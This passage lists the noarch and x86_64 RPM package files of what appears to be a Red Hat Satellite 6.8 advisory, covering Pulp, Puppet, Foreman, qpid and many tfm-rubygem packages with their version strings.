pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm python3-async-timeout-3.0.1-2.el7ar.noarch.rpm python3-attrs-19.3.0-3.el7ar.noarch.rpm python3-chardet-3.0.4-10.el7ar.noarch.rpm python3-dateutil-2.8.1-2.el7ar.noarch.rpm python3-idna-2.4-2.el7ar.noarch.rpm python3-idna-ssl-1.1.0-2.el7ar.noarch.rpm python3-prometheus-client-0.7.1-2.el7ar.noarch.rpm python3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm python3-six-1.11.0-8.el7ar.noarch.rpm python3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm receptor-0.6.3-1.el7ar.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm rubygem-rack-1.6.12-1.el7sat.noarch.rpm rubygem-rake-0.9.2.2-41.el7sat.noarch.rpm satellite-6.8.0-1.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-cli-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm tfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm tfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm tfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm tfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm tfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm tfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm tfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm tfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm tfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm tfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm tfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm tfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm tfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm tfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm tfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm tfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm tfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm tfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm tfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm tfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm tfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm tfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm tfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm tfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm tfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm tfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm tfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm tfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm tfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm tfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm tfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm tfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm tfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm tfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm tfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm tfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm tfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm tfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm tfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm tfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm tfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm tfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm tfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm tfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm tfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm tfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm tfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm tfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm tfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm tfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm tfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm tfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm tfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm tfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm tfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm tfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm tfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm tfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm tfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm tfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm tfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm tfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm tfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm tfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm tfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm tfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm tfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm tfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm tfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm tfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm tfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm tfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm tfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm tfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm tfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm tfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm tfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm tfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm tfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm tfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm tfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm tfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm tfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm tfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm tfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm tfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm tfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm tfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm tfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm tfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm tfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm tfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm tfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm tfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm tfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm tfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm tfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm tfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm tfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm tfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm tfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm tfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm tfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm tfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm tfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm tfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm tfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm tfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_passenger-4.0.18-24.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm pcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm python-pymongo-3.2-2.el7sat.x86_64.rpm python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm python-qpid-proton-0.28.0-3.el7.x86_64.rpm python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm python-saslwrapper-0.22-5.el7sat.x86_64.rpm python-simplejson-3.2.0-1.el7sat.x86_64.rpm python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm python-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm python-zope-interface-4.0.5-4.el7.x86_64.rpm python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm python2-gobject-3.28.3-2.el7sat.x86_64.rpm python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm python2-markupsafe-0.23-21.el7sat.x86_64.rpm python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm python2-twisted-16.4.1-12.el7sat.x86_64.rpm python3-aiohttp-3.6.2-4.el7ar.x86_64.rpm python3-multidict-4.7.4-2.el7ar.x86_64.rpm python3-yarl-1.4.2-2.el7ar.x86_64.rpm qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm qpid-proton-c-0.28.0-3.el7.x86_64.rpm qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm qpid-qmf-1.36.0-28.el7amq.x86_64.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm rubygem-facter-2.4.1-2.el7sat.x86_64.rpm rubygem-newt-0.9.6-3.el7sat.x86_64.rpm rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm rubygem-passenger-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm saslwrapper-0.22-5.el7sat.x86_64.rpm saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm tfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm 